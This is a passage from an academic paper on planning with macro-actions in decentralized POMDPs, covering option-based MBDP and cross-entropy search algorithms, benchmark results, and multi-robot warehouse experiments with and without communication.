Dec-POMDP) horizon, while t is a macro-action step. While backups will often result in increasing policy length by more than one primitive step, we conservatively use one step here, but recognize that more accurate calculations along with corresponding better state estimates are possible. 830 Modeling and Planning with Macro-Actions in Decentralized POMDPs Algorithm 2 Option-based memory bounded dynamic programming (O-MBDP) 1: function OptionMBDP(MaxTrees,h,Hpol) 2: t ← 0 3: PrimitiveHorizonBelowh ← true 4: Mt ←∅ 5: repeat 6: Mt+1 ←ExhaustiveBackup(Mt) 7: M̂t+1 ←∅ 8: for all k ∈ MaxTrees do 9: sk ← GenerateState(Hpol,h− t− 1) 10: µ̂t+1 ←M̂t+1 ∪ arg maxµt+1∈Mt+1 V µt+1 (sk) 11: end for 12: t ← t + 1 13: Mt ←M̂t+1 14: PrimitiveHorizonBelowh ←TestPolicySetsLength(Mt) 15: until PrimitiveHorizonBelowh = false 16: return Mt 17: end function as in the dynamic programming approach in Algorithm 1, but does not have to produce all policies that will reach horizon h as the algorithm no longer is seeking hierarchical optimality. Scalability can therefore be adjusted by reducing the MaxTrees parameter (although solution quality may be reduced). 4.3 Direct Cross Entropy Policy Search Another method for solving Dec-POMDPs that has been effective is a cross entropy method, called DICE (for DIrect Cross Entropy) (Oliehoek, Kooi, & Vlassis, 2008). Instead of using dynamic programming, this method searches through the space of policy trees by sampling. That is, it maintains sampling distributions (the probability of choosing an action) at each history of each agent. Policies are sampled based on these distributions and the resulting joint policies are evaluated. A fixed number of best-performing policies are retained and the sampling distributions are updated based on the action choice frequency of these policies (mixed with the current distributions). Policy sampling and distribution updates continue for a fixed number of iterations (or a convergence test such as one based on KL-divergence). The macro-action version of DICE is described in Algorithm 3. The inputs are the number of iterations of the algorithm (Iter), the number of joint policies to sample at each iteration, N, the number of joint policies used for updating the sampling distributions, Nb, the learning rate, α, and the (primitive) horizon, h. The best value, Vbest, is initialized to negative infinity and the sampling distributions are typically initialized to uniform action distributions. In the macro-action case, sampling distributions that are based on option histories are used instead of primitive histories. Specifically, we maintain ξh M i (m) for each option history hMi , of each agent, i, which represents the probability of selecting macro-action m after that agent observes history hMi . The algorithm then begins with an empty set 831 Amato, Konidaris, Kaelbling & How Algorithm 3 Option-based direct cross entropy policy search (O-DICE) 1: function OptionDICE(Iter,N,Nb,α,h) 2: Vbest ←−∞ 3: ξ ←InitialDistribution 4: for all i ∈ Iter do 5: M←∅ 6: for n ← 0 to N do 7: µ ← Sample(ξ) 8: M←M∪{µ} 9: V ← V µ(s0) 10: if V > Vbest then 11: Vbest ← V 12: µbest ← µ 13: end if 14: end for 15: Mbest ←KeepBestPols(M,Nb) 16: ξnew ← Update(ξ) 17: ξnew ← αξnew + (1 −α)ξ 18: ξ ← ξnew 19: end for 20: return µbest 21: end function of joint policies, M, and samples N policies for each agent. Because macro-actions often have limited initial and terminal conditions, sampling is more complicated. It is done in a top down fashion from the first macro-action until the (primitive) horizon is reached, while taking into account the possible macro-observations after starting from the initial state and executing the policy to that point. This allows both the terminal conditions and initial sets to be used to create distributions over valid macro-actions based on the previous histories. These N policies for each agent are evaluated and the if a new best policy is found, the value and policy are stored in Vbest and µbest. The policies with the Nb highest values from the N are stored in Mbest and ξnew is updated for each agent’s histories with ξ hMi new(m) = 1/Nb ∑ µ∈Mbest I(πi,h M i ,m) where I(µi,h M i ,m) is an indicator variable that is 1 when macro-action m is taken by policy µi after history h M i . This ξnew is mixed with the previous distribution, ξ, based on the learning rate, α, and the process continues until the number of iterations is exhausted. The best joint policy, µbest can then be returned. 5. Simulation-Based Execution in MacDec-POMDPs The MacDec-POMDP framework is a natural way to represent and generate behavior for realistic general problems such as multi-robot systems, but requiring full knowledge of both the high-level macro-action model and the low-level Dec-POMDP model is often impracti- cal. To use the MacDec-POMDP model as described above, we would assume an abstract model of the system is given in the form of macro-action representations, which include 832 Modeling and Planning with Macro-Actions in Decentralized POMDPs the associated policies as well as initiation and terminal conditions. These macro-actions are controllers operating in (possibly) continuous time with continuous (low-level) actions and feedback, but their operation is discretized for use with the planner. This discretiza- tion represents an underlying discrete Dec-POMDP which consists of the primitive actions, states of the system, and the associated rewards. While the complexity of MacDec-POMDP solution methods primarily depends on the size of the MacDec-POMDP model, and not the size of the underlying Dec-POMDP (as only policies over macro-actions are needed with execution in the underlying Dec-POMDP being fixed), it is often difficult to generate and represent a full Dec-POMDP model for real-world systems. We therefore extend this model to use a simulator rather than a full model of the problem, as shown in Figure 5. In many cases, a simulator already exists or is easier to construct than the full model. Our planner still assumes the set of macro-actions and macro- observations are known, but the policies of the macro-actions as well as the underlying Dec-POMDP are not explicitly known. Instead, we make the more realistic assumption that we can simulate the macro-actions in an environment similar to the real-world domain. As such, our proposed algorithms for generating policies over macro-actions remain the same (since constructing policies of macro-actions only requires knowledge of the set of macro-actions and their initiation and terminal conditions), but all evaluation is conducted in the simulator (through sampling) rather than through enumerating all reachable states to compute the Bellman equation. That is, by using policy search, we can decouple the process of finding solutions with the process of evaluating them. As a result, we assume the macro-action and macro-observation sets are discrete, but the underlying state, action and observation spaces can be continuous. Op#mized controllers for each robot (in SMACH format) System descrip#on (macro-‐ac#ons, dynamics, sensor uncertainty, rewards/costs) Planner (solving the MacDec-‐POMDP) Figure 5: A high level system diagram for multi-robot problems where the system can be described formally or using a simulator, solutions are generated with our planning methods and the output is a set of controllers, one for each robot. Specifically, a fixed policy can be evaluated by Monte Carlo sampling starting at an initial state (or belief state), choosing an action for each agent according to the policy, sampling an observation from the system, updating the current position in the policy (i.e., the current node in each agent’s policy tree) and then continuing this process until some maximum time step has been reached. The value of the k-th sample-based trajectory starting at s0 and using policy π is given by V π,k(s0) = r k 0 + . . . + γ TrkT , where r k t is the reward given to the team on the t-th step. After K trajectories, V̂ π(s0) = ∑K k=1 V π,k(s0) K . 833 Amato, Konidaris, Kaelbling & How As the number of samples increases, the estimate of the policy’s value will approach the true value. This sample-based evaluation is necessary in large or continuous state spaces. Sample-based evaluation has been used in the Dec-POMDP case (Wu, Zilberstein, & Chen, 2010b; Liu, Amato, Liao, Carin, & How, 2015), but we extend the idea to the macro-action case where there is the added benefit of abstracting away the details of the macro-action policies. In the multi-robot case, given the macro-actions, macro-observations and simulator, our off-line planners can automatically generate a solution which optimizes the value function with respect to the uncertainty over outcomes, sensor information, and other robots. The planner generates the solution in the form of a set of policy trees (as in Figure 4) which are parsed into a corresponding set of SMACH controllers (Bohren, 2010), one for each robot. SMACH controllers are hierarchical state machines for use in a ROS (Quigley, Conley, Gerkey, Faust, Foote, Leibs, Wheeler, & Ng, 2009) environment. Just like the policy trees they represent, each node in the SMACH controller represents a macro-action which is executed on the robot (e.g., navigation to a waypoint or wait for another robot) and each edge corresponds to a macro-observation. Our system can automatically generate SMACH controllers—which are typically designed by hand—for complex, general multi- robot systems. 6. Experiments We test the performance of our macro-action-based algorithms in simulation, using existing benchmarks, a larger domain, and in a novel multi-robot warehousing domain. 6.1 Simulation Experiments For the simulation experiments, we test on a common Dec-POMDP benchmark, a four agent extension of this benchmark, and a large problem inspired by robot navigation. Our algo- rithms were run on a single core 2.5 GHz machine with 8GB of memory. For option-based MBDP (O-MBDP), heuristic policies for the desired lengths were generated by producing 1000 random policies and keeping the joint policy with the highest value at the initial state. Sampling was used (10000 simulations) to determine if a policy will terminate before the horizon of interest. 6.1.1 An Existing Dec-POMDP Problem: Meeting in a Grid The meeting-in-a-grid problem is an existing two-agent Dec-POMDP benchmark in which agents receive 0 reward unless they are both in one of two corners in a 3x3 grid (Amato et al., 2009). Agents can move up, down, left, right or stay in place, but transitions are noisy, so an agent may move to an adjacent square rather than its desired location. Each agent has full observability of its own location, but cannot observe the other agent (even when they share the same grid square). We defined two options for each agent: each one moving the agent to one of the two goal corners. Options are valid in any (local) state and terminate when they reach the appropriate goal corner. An agent stays in a corner on a step by choosing the appropriate option again. Macro-observations are the agent’s location (they are the same as the primitive observations, but the agent only observes 834 Modeling and Planning with Macro-Actions in Decentralized POMDPs Va lu e 0 25 50 75 100 Horizon 0 25 50 75 100 O-DP O-MBDP(3) DecRSPI MBDP(3) FB-HSVI Ti m e (s ) 0 7500 15000 22500 30000 Horizon 0 25 50 75 100 O-DP O-MBDP(3) DecRSPI MBDP(3) FB-HSVI Figure 6: Value and time results for the meeting in a grid Dec-POMDP benchmark includ- ing leading Dec-POMDP approaches DecRSPI and MBDP as well as option-based DP and MBDP. it’s updated location after completion of a macro-action). It is clear that these options provide the important macro-actions for the agents and navigation is possible based on local information in this problem. While this is a very small problem, it allows for direct comparison with Dec-POMDP methods. Results for this problem are split between Figure 6 and Table 1 because not all results are available for all algorithms. We compared against one leading optimal Dec-POMDP al- gorithm, feature-based heuristic search value iteration (FB-HSVI) (Dibangoye et al., 2016), and three leading approximate Dec-POMDP algorithms: MBDP with incremental policy generation (MBDP-IPG) (Amato et al., 2009), rollout sampling policy iteration (DecR- SPI) (Wu et al., 2010a) and trial-based dynamic programming (TBDP) (Wu et al., 2010b). MaxTrees = 3 was used in both O-MBDP and MBDP-IPG (referred to as MBDP in the figure and table). Results for other algorithms are taken from their respective publications. As such, results were generated on different machines, but the trends should remain the same. The left figure shows that all approaches achieve approximately the same value, but option-based DP (O-DP) cannot solve horizons longer than 10 without running out of memory. Impressively, FB-HSVI is able to scale to horizon 30 by not explicitly represent- ing a policy and maintaining a compressed distribution over agent histories and the state. Nevertheless, since FB-HSVI is an optimal method, it becomes intractable as the horizon grows (it would be an interesting area of future research to see how macro-actions could be combined with the compressed representation of FB-HSVI). The right figure shows the time required for different horizons. All approaches run quickly for small horizons, but DecRSPI required an intractable amount of time as the horizon grows. The table shows time and value results for larger horizons. Again, all approaches achieve similar values, but O-MBDP is much faster than MBDP-IPG or TBDP. The benefit of using a macro-action representa- tion can be seen most directly by comparing O-MBDP and MBDP, which are both based on the same algorithm: there is a significant improvement in running time, while solution quality is maintained. 835 Amato, Konidaris, Kaelbling & How Value Time (s) h = 100 h = 200 h = 100 h = 200 O-MBDP(3) 94.4 194.4 133 517 MBDP(3) 92.1 193.4 3084 13875 TBDP 92.8 192.1 427 1372 Table 1: Times and values for larger horizons on the meeting in a grid benchmark. VAL 6 8 10 15 20 size 10 O-DP 0 8.00E-04 0.0095 O-MBDP 0 0.002 0 0.0516 0.2423 TIME 6 8 10 15 20 size 10 O-DP 7.6325 153.665 11574.73 O-MBDP 14.6114 40.2515 72.914 245.49563 413.1414 0 0.05 0.1 0.15 0.2 0.25 5 10 15 20 10x10 Va lu e Horizon O-DP O-MBDP 0 3000 6000 9000 12000 5 10 15 20 10x10 Ti m e (s ) Horizon O-DP O-MBDP Figure 7: 4-agent meeting in a grid results showing (a) value and (b) running time on a 10 × 10 grid. 6.1.2 Larger Grids with More Agents To test the scalability of these approaches, we consider growing the meeting-in-a-grid bench- mark to a larger grid size and a larger number of agents. That is, agents still receive zero reward unless all agents are in one of the goal corners. The same options and macro- observations are used as in the 3x3 version of the problem. We generated results for several four-agent problems with random starting locations for each agent. We did not compare with current optimal or approximate Dec-POMDP methods because, while they may be theoretically applicable, current implementations cannot solve problems with more than two agents or the methods assume structure (e.g., factorization or independence) that is not present in our problem. Results for option-based dynamic programming and MBDP on problems with a 10×10 grid are shown in Figure 7. Three trees were used for O-MBDP. It is worth noting that these are very large problems with 108 states. Also, the 4-agent version of the problem is actually much harder than the 2-agent problem in Section 6.1.1, because all 4 agents must be in the same square to receive any reward (rather than just 2) and the grid is much larger (10x10 rather than 3x3). Agents are randomly initialized, but for horizon 10, it may be impossible for all 4 agents to reach each other in the given time. By horizon 20 (the largest we solved), the agents can often reach each other, but just at the later horizons due to noise and the large grid. For instance, an optimal solution to a deterministic version of this problem (an upper bound for the stochastic problem we use) for horizon 20 is approximately 836 Modeling and Planning with Macro-Actions in Decentralized POMDPs 2. The dynamic programming method is able to solve problems with a long enough horizon to reach the goal (producing positive value), but higher horizons are not solvable. The MBDP-based approach is able to solve much larger horizons, requiring much less time than O-DP. O-MBDP is able to produce near-optimal values for horizons that are also solvable by O-DP, but results may be further from optimal as the horizon grows (as is often the case with MBDP-based approaches). 6.1.3 Two-Agent NAMO We also consider a two-agent version of the problem of robots navigating among movable obstacles (Stilman & Kuffner, 2005). Here, as shown in Figure 8, both agents are trying to reach a goal square (marked by G), but there are obstacles in the way. Each robot can move in four directions (up, down, left and right) or use a ‘push’ action to attempt to move a box to a specific location (diagonally down to the left for the large box and into the corner for both small boxes). The push action fails and the robot stays in place when the robot is not in front of the box. Robots can move the small boxes (b1 and b2) by themselves, but must move the larger box (b3) together. Observations are an agent’s own location (but not the location of the other agent) and whether the large box or the same numbered box has been moved (i.e., agent 1 can observe box 1 and agent 2 can observe box 2). There is noise in both navigation and in box movement: movement is successful with probably 0.9 and pushing the small and large boxes is successful with probably 0.9 and 0.8, respectively. To encourage the robots to reach the goal as quickly as possible, there is a negative reward (-1) when any agent is not in the goal square. Four options were defined for each agent. These consisted of 1) moving to a designated location to push the big box, 2) attempting to push the large box, 3) pushing the designated small box (box 1 for agent 1 and box 2 for agent 2) to the corner square, and 4) moving to the goal. The option of moving to the goal is only valid when at least one box has been moved and movement of any box is only valid if the large box and the agent’s designated box has not yet been moved. Movement options terminate at the desired location and pushing options terminate with the box successfully or unsuccessfully moved. Macro-observations were the same as primitive observations (the agent’s location and box movements). These options provide high-level choices for the agents to coordinate on this problem, while ab- stracting away the navigation tasks to option execution. Options for just moving to the small boxes could also be incorporated, but were deemed unnecessary because coordination is unnecessary for pushing the small boxes. Results for option-based dynamic programming are given in Figure 9. Here, O-DP performs very well on a range of different problem sizes and horizons. Because negative reward is given until both agents are in the goal square, more steps are required to reach the goal as the problem size increases. The agents will stay in the goal upon reaching it, causing the value to plateau. As shown in the top figure, O-DP is able to produce this policy for the different problem sizes and horizons. The running times for each of the grid sizes (5 × 5 to 25 × 25) are shown in the bottom figure for the horizon 25 problem. Here, we see the running time increases for larger state spaces but the growth is sublinear. A comparison with other Dec-POMDP algorithms (including O-MDBP) is shown in Table 2. For TBDP and GMAA-ICE* (a leading optimal Dec-POMDP algorithm) (Oliehoek 837 Amato, Konidaris, Kaelbling & How b2 G b1 b3 Figure 8: A 6x6 two-agent NAMO problem. -30 -22.5 -15 -7.5 0 0 7.5 15 22.5 30 Value size 5 size 10 size 15 size 20 0 150 300 450 600 0 5 10 15 20 25 30 Time Ti m e (s ) -40 -30 -20 -10 0 0 10 20 30 40 Value Va lu e Horizon size 5 size 10 size 15 size 20 size 25 0 750 1500 2250 3000 0 10 20 30 40 Time Ti m e (s ) Horizon size 5 size 10 size 15 size 20 size 25 0 5 10 15 20 25 30 ? Size size 5 size 10 size 15 size 20 0 125 250 375 500 0 875000 1750000 2625000 3500000 Chart 6 Ti m e (s ) Number of States O-DP horizon 25 Figure 9: Value and time results for O-DP in the two-agent NAMO problem for various size grids (where size is the length of a single side) et al., 2013), the grid size was increased while at least horizon 4 could be solved and then the horizon was increased until it reached 100. Results for these algorithms were provided by personal communication with the authors and run on other machines, but the trends remain the same. For O-MBDP, 20 trees were used because smaller numbers resulted in poor performance, but parameters were not exhaustively evaluated. The results show that TBDP is able to solve the 4×4 problem, but runs out of memory when trying to solve any 5 × 5 problems. GMAA*-ICE can solve larger problem sizes, but runs out of memory for larger horizons. GMAA*-ICE scales better with the increased state space because it is able to exploit the factorization of the problem, but is limited to very small horizons because it is solving the underlying Dec-POMDP optimally. The inability for current approaches to solve these problems is not surprising given their size. By contrast, O-DP is able to solve the 25×25 problem which has over 3 million states states while O-MBDP solves the 50×50 problem that has has 50 million states. O-MBDP is able to solve even larger problems, but we did not analyze its performance beyond the 50 × 50 problem. 3. Larger problem sizes were not tested for GMAA*-ICE, but some may be solvable. Note that for any problem larger than 4 × 4 horizons beyond 4 are not solvable and the running time is already high for the 12 × 12 case. 838 Modeling and Planning with Macro-Actions in Decentralized POMDPs Num. of States h Value Time (s) O-DP 3.125 × 106 100 −42.7 40229 O-MBDP(20) 5 × 107 100 −93.0 4723 GMAA*-ICE3 165, 888 4 −4 11396 TBDP 2, 048 100 −6.4 1078 Table 2: Largest representative NAMO problems solvable by each approach. For GMAA*- ICE and TBDP problem size was increased until horizon 4 was not solvable. Figure 10: The multi-robot warehouse domain with depots and robots labeled. 6.2 Multi-Robot Experiments We also tested our methods in a warehousing scenario using a collection of iRobot Creates (Figure 10) where we varied the communication capabilities available to the robots. The re- sults demonstrate that our methods can automatically generate the appropriate motion and communication behavior while considering uncertainty over outcomes, sensor information and other robots. 6.2.1 The Warehouse Domain We consider three robots in a warehouse that are tasked with finding and retrieving boxes of two different sizes: large and small. Robots can navigate to known depot locations (rooms) to retrieve boxes and bring them back to a designated drop-off area. The larger boxes can only be moved effectively by two robots (if a robot tries to pick up the large box by itself, it will move to the box, but fail to pick it up). While the locations of the depots are known, the contents (the number and type of boxes) are unknown. In our implementation, we assumed there were three boxes (one large and two small), each of which was equally likely to be in one of two depots. Our planner generates a SMACH controller for each of the robots off-line using our option-based algorithms. These controllers are then executed online in a decentralized manner. 839 Amato, Konidaris, Kaelbling & How In each scenario, we assumed that each robot could observe its own location, see other robots if they were within (approximately) one meter, observe the nearest box when in a depot and observe the size of the box if it is holding one (defining the resulting macro- observations). In the simulator used by the planner to evaluate solutions, the resulting state space includes the location of each robot (discretized into nine possible locations) and the location of each of the boxes (in a particular depot, with a particular robot or at the goal). In particular, there are ∏ i∈I locAgi× ∏ b∈B locBb states, where locAgi is the location of an agent and is discretized to a 3x3 grid and locBb represents the location of each of 3 boxes (at a depot, with a robot, at a goal, or with a pair of robots), with the size of locBb for all b is numDepots + numAgents + numGoals + numAgents∗numAgents where we set numDepots = 2, numAgents = 3 and numGoals = 1. The primitive actions are to move in four different directions as well as pickup, drop and communication actions. The macro-actions and macro-observations vary a bit for each scenario, but are detailed in the sections below. Note that this primitive state and action representation is used for evaluation purposes and not actually implemented on the robots (which just utilize the SMACH controllers). Higher fidelity simulators could also be used, but running time may increase if the simulations are computationally intensive (average solution times for the policies presented below were approximately one hour). The three-robot version of this scenario has 2,460,375 states, which is several orders of magnitude larger than problems typically solvable by Dec-POMDP approaches.8 These problems are solved using the option- based MBDP algorithm initialized with a hand coded heuristic policy. Navigation has a small amount of noise in the amount of time required to move to locations (reflecting the real-world dynamics): this noise increases when the robots are pushing the large box (reflecting the need for slower movements and turns in this case). Specifically, the robots were assumed to transition to the desired square deterministically with no boxes, with probability 0.9 with the small box and with probability 0.8 with the large box. Picking up boxes and dropping them was assumed to be deterministic. These noise parameters were assumed to be known in this work, but they could also be learned by executing macro-actions multiple times in the given initiation sets.9 Note that the MacDec- POMDP framework is very general so other types of macro-actions and observations could also be used (including observation of other failures). More details about each scenario are given below. 6.2.2 Scenario 1: No Communication In the first scenario, the robots cannot communicate with each other. Therefore, all coop- eration is based on the controllers that are generated by the planner (which were generated offline) and observations of the other robots (when executing online). The macro-actions were: Go to depot 1, Go to depot 2, Go to the drop-off area, Pick up the small box, Pick up the large box, and Drop off a box. 8. Our state representation technically has 1,259,712,000 states, since we also include observations of each agent (of which there are 8 in this version of the problem) in the state space. 9. These parameters and controllers were loosely based on the actual robot navigation and box pushing. Other work has looked at more directly determining these models and parameters (Amato, Konidaris, Anders, Cruz, How, & Kaelbling, 2017; Omidshafiei et al., 2017). 840 Modeling and Planning with Macro-Actions in Decentralized POMDPs (a) Two robots set out for differ- ent depots. (b) Robots observe boxes in de- pots (large on left, small on right). (c) White robot moves to the large box and green robot moves to the small one. (d) The white robot waits at the large box while green robot pushes the small box. (e) Green robot drops the box off at the goal. (f) The green robot goes to depot 1 and sees the other robot and large box. (g) Green robot moves to help the white robot. (h) The green robot moves to the box and the two robots push it back to the goal. Figure 11: Scenario 1 (no communication). The depot macro-actions are applicable anywhere and terminate when the robot is within the walls of the appropriate depot. The drop-off and drop macro-actions are only applicable if the robot is holding a box, and the pickup macro-actions are only applicable when the robot observes a box. Picking up the small box was assumed to succeed determin- istically, but the model could easily be adjusted if the pickup mechanism is less robust. The macro-observations are the basic ones defined above: the robot can observe it’s own location (9 discrete positions), whether there is another robot present in the location, observe the nearest box when in a depot (small, large or none) and observe the size of the box if it is holding one (small, large or none). The macro-actions correspond to natural choices for robot controllers. This case10 (seen in Figure 11 along with a depiction of the executed policy in Figure 12) uses only two robots to more clearly show the optimized behavior in the absence of communication. The robots begin in the drop-off area and the policy generated by the planner begins by assigning one robot to go to each of the depots (seen in Figure 11(a)). The robots then observe the contents of the depots they are in (seen in Figure 11(b)). If 10. All videos can be seen at http://youtu.be/fGUHTHH-JNA 841 Amato, Konidaris, Kaelbling & How d2 m ps d1 d1 m d1 m d1 m goal g m , D2 m dr m pl goal g m , D1 m dr , D2 , goal , , D1 , goal m pl goal g m , D1 m dr , , D1 , goal , D1 , D1 d1 [repeat for 6 more steps ] Macro-actions d1=depot 1 d2=depot 2 g=goal (drop-off area) ps=pick up small box pl=pick up large box dr=drop box Figure 12: Path executed in policy trees for the no communication scenario by the white robot (left) and the green robot (right). Only macro-actions executed (nodes) and observations seen are shown. Observations are shown pictorially, with the box sizes (small as a square and large as a rectangle) and robots (white create) given along the corresponding edge. there is only one robot in a depot and there is a small box to push, the robot will push the small box (Figures 11(c) and 11(d)). If the robot is in a depot with a large box and no other robots, it will stay in the depot, waiting for another robot to come and help push the box (Figure 11(d)). In this case, once the other robot is finished pushing the small box (Figure 11(e)), it goes back to the depots to check for other boxes or robots that need help (Figure 11(f)). When it sees another robot and the large box in the depot on the left (depot 1), it attempts to help push the large box (Figure 11(g)) and the two robots are successful pushing the large box to the goal (Figure 11(h)). The planner has automatically derived a strategy for dynamic task allocation—two robots go to each room, and then search for help needed after pushing any available boxes. This behavior was generated by an optimization process that considered the different costs of actions and the uncertainty involved (in the current step and into the future) and used those values to tailor the behavior to the particular problem instance. 842 Modeling and Planning with Macro-Actions in Decentralized POMDPs (a) The three robots begin moving to the waiting room. (b) One robot goes to depot 1 and two robots go to depot 2. The de- pot 1 robot sees a large box. (c) The robot saw a large box, so it moved to the waiting room while the other robots pushed the small boxes. (d) The depot 1 robot waits while the other robots push the small boxes. (e) The two robots drop off the small boxes at the goal while the other robot waits. (f) The green robot goes to the waiting room to check for signals and the white robot sends signal #1. (g) Signal #1 is interpreted as a need for help in depot 1, so they move to depot 1 and push the large box. (h) The two robots in depot 1 push the large box back to the goal. Figure 13: Scenario 2 (limited communication). 6.2.3 Scenario 2: Local Communication In scenario 2, robots can communicate when they are within one meter of each other. The macro-actions are the same as above, but we added ones to communicate and wait for communication. The resulting macro-action set is: Go to depot 1, Go to depot 2, Go to the drop-off area, Pick up the small box, Pick up the large box, Drop off a box, Go to an area between the depots (the "waiting room"), Send signal #1, Send signal #2, and Wait in the waiting room for another robot. Here, we allow the robots to choose to go to a “waiting room” which is between the two depots. This permits the robots to possibly communicate or receive communications before committing to one of the depots. The waiting-room macro-action is applicable in any situation and terminates when the robot is between the waiting room walls. The depot macro-actions are now only applicable in the waiting room, while the drop-off, pick up and drop macro-actions remain the same. The wait macro-action is applicable in the 843 Amato, Konidaris, Kaelbling & How waiting room and terminates when the robot observes another robot in the waiting room. The signaling macro-actions are applicable in the waiting room and are observable by other robots that are within approximately a meter of the signaling robot. The macro-observations are the same as in the previous scenario, but now include observations for the two signals. Note that we do not specify how each communication signal should be interpreted, or when they should be sent. The results for this three-robot domain are shown in Figure 13. The robots go to the waiting room (Figure 13(a)) and then two of the robots go to depot 2 (the one on the right) and one robot goes to depot 1 (the one on the left) (Figure 13(b)). Because there are three robots, the choice for the third robot is random while one robot will always be assigned to each of the depots. Because there is only a large box to push in depot 1, the robot in this depot goes back to the waiting room to try to find another robot to help it push the box (Figure 13(c)). The robots in depot 2 see two small boxes and they choose to push these back to the goal (also Figure 13(d)). Once the small boxes are dropped off (Figure 13(e)) one of the robots returns to the waiting room and then is recruited by the other robot to push the large box back to the goal (Figures 13(f) and 13(g)). The robots then successfully push the large box back to the goal (Figure 13(h)). In this case, the planning process determines how the signals should be used to perform communication. 6.2.4 Scenario 3: Global Communication In the last scenario, the robots can use signaling (rather than direct communication). In this case, there is a switch in each of the depots that can turn on a blue or red light. This light can be seen in the waiting room and there is another light switch in the waiting room that can turn off the light. (The light and switch were simulated in software and not incorporated in the physical domain.) The macro-actions were: Go to depot 1, Go to depot 2, Go to the drop-off area, Pick up the small box, Pick up the large box, Drop off a box, Go to the "waiting room", Turn on a blue light, Turn on a red light, and Turn off the light. The first seven macro-actions are the same as for the communication case except we relaxed the assumption that the robots had to go to the waiting room before going to the depots (making both the depot and waiting room macro-actions applicable anywhere). The macro-actions for turning the lights on are applicable in the depots and the macro-actions for turning the lights off are applicable in the waiting room. The macro-observations are the same as in the previous scenario, but the two signals are now the lights instead of the communication signals. While the lights were intended to signal requests for help in each of the depots, we did not assign a particular color to a particular depot. In fact, we did not assign them any meaning at all, allowing the planner to set them in any way that improves performance. The results are shown in Figure 14. Because one robot started ahead of the others, it was able to go to depot 1 to sense the size of the boxes while the other robots go to the waiting room (Figure 14(a)). The robot in depot 1 turned on the light (red in this case, but not shown in the images) to signify that there is a large box and assistance is needed (Figure 14(b)). The green robot (the first other robot to the waiting room) sees this light, interprets it as a need for help in depot 1, and turns off the light (Figure 14(c)). The other 844 Modeling and Planning with Macro-Actions in Decentralized POMDPs (a) One robot starts first and goes to depot 1 while the other robots go to the waiting room. (b) The robot in depot 1 sees a large box, so it turns on the red light (the light is not shown). (c) The green robot sees light first, turns it off, and goes to depot 1. The white robot goes to depot 2. (d) Robots in depot 1 move to the large box, while the robot in depot 2 begins pushing the small box. (e) Robots in depot 1 begin push- ing the large box and the robot in depot 2 pushes a small box to the goal. (f) The robots from depot 1 suc- cessfully push the large box to the goal. Figure 14: Scenario 3 (signaling). robot arrives in the waiting room, does not observe a light on and moves to depot 2 (also Figure 14(c)). The robot in depot 2 chooses to push a small box back to the goal and the green robot moves to depot 1 to help the other robot (Figure 14(d)). One robot then pushes the small box back to the goal while the two robots in depot 1 begin pushing the large box (Figure 14(e)). Finally, the two robots in depot 1 push the large box back to the goal (Figure 14(f)). This behavior is optimized based on the information given to the planner. The semantics of all these signals as well as the movement and signaling decisions were decided on by the planning algorithm to maximize value. 6.2.5 Simulation Results We also evaluated the multi-robot experiments in the simulator to evaluate the difference in performance between option-based MBDP (O-MBDP) and option-based direct cross entropy policy search (O-DICE). Option-based dynamic programming is not scalable enough to solve the domains to the horizons considered. For O-MBDP, maxTrees = 3, which was chosen to balance solution quality and running time. For O-DICE, Iter = 100, N = 10, Nb = 5, and α = 0.1, which were chosen based on suggestions from the original work (Oliehoek et al., 2008). A version of O-DICE was also implemented that, rather than maintaining sampling distributions for the whole tree, only maintains a single sampling distribution that is used at each node in the tree. This later version of O-DICE is referred to as O-DICE (1) and can be thought of as a biased form of Monte Carlo sampling. As can be seen in Table 3, O-DICE outperforms O-MBDP in terms of both value and time. In all cases, versions of O-DICE are more scalable than O-MBDP, even though only 3 trees were used for O-MBDP. For problems in which both O-MBDP and O-DICE 845 Amato, Konidaris, Kaelbling & How No Communication O-MBDP(3) O-DICE (1) O-DICE (full) value time (s) value time (s) value time (s) Horizon 7 0 10910 0 50 0 312 Horizon 8 0 27108 0 552 0 3748 Horizon 9 1.161 161454 1.169 601 1.158 5247 Horizon 10 − − 2.163 618 2.159 6400 Horizon 11 − − 3.033 699 3.120 10138 Communication O-MBDP(3) O-DICE (1) O-DICE (full) value time (s) value time (s) value time (s) Horizon 7 0.225 49 0.221 46 0.217 207 Horizon 8 0.421 139 0.409 444 0.420 2403 Horizon 9 1.60 ∗ 1.650 549 1.650 3715 Horizon 10 − − 2.179 901 2.795 3838 Horizon 11 − − − − − − Signalling O-MBDP(3) O-DICE (1) O-DICE (full) value time (s) value time (s) value time (s) Horizon 7 0.225 353 0.221 63 0.221 204 Horizon 8 0.421 16466 0.417 649 0.430 4011 Horizon 9 1.663 87288 1.691 659 1.694 7362 Horizon 10 − − 2.392 682 2.782 7447 Horizon 11 − − 3.756 763 3.964 10336 Table 3: Multi-robot warehouse simulation results for option-based MBDP (O-MBDP) and option-based direct cross entropy search (O-DICE) using parameters for full his- tories (full) or just a single value (1). Value and time in seconds is given with − signifying the algorithm runs out of memory before generating any valid solution and ∗ signifying the algorithm runs out of memory before completion. could produce solutions, the values were very similar, but the O-DICE methods required significantly less time. O-MBDP either runs out of memory (due to the large number of trees generated during a backup step) or takes a really long time to generate the maxTrees trees. Using more efficient versions of MBDP (e.g., Wu et al., 2010a) should improve performance, but performance improvements could also be made to O-DICE. An extensive comparison has not been conducted between these algorithms even for primitive action Dec-POMDP domains, but we expect that performance will depend on the domain and parameters used 846 Modeling and Planning with Macro-Actions in Decentralized POMDPs (e.g., heuristics in MBDP). The full version of O-DICE was able to outperform the single parameter version of O-DICE in terms of value, but also required more time. 6.2.6 Infinite Horizon Comparisons Unlike POMDPs, Dec-POMDP finite-horizon methods are typically not scalable enough to solve large or infinite-horizon problems. As a consequence, special-purpose infinite-horizon methods have been developed which typically use a finite-state controller policy represen- tation instead of a policy tree. The finite-state controller allows memory to be bounded. As a consequence, finite-state controller-based methods are typically more scalable for large horizon problems, but perform poorly for smaller horizons. Finite-state controllers, which condition action selection on an internal memory state, have been widely used in Dec-POMDPs (Bernstein et al., 2009; Amato, Bernstein, & Zil- berstein, 2010a; Amato, Bonet, & Zilberstein, 2010b; Pajarinen & Peltonen, 2011; Wu et al., 2013; Kumar, Zilberstein, & Toussaint, 2015; Kumar, Mostafa, & Zilberstein, 2016). Finite-state controllers operate in the same way as policy trees in that there is a designated initial node and following action selection at that node, the controller transitions to the next node depending on the observation seen. This continues for the infinite steps of the problem. Finite-state controllers explicitly represent infinite-horizon policies, but can also be used for finite-horizon policies. Recently, we and others have extended the ideas of macro-actions from this paper to use finite-state controller representations. In particular, heuristic search (Amato et al., 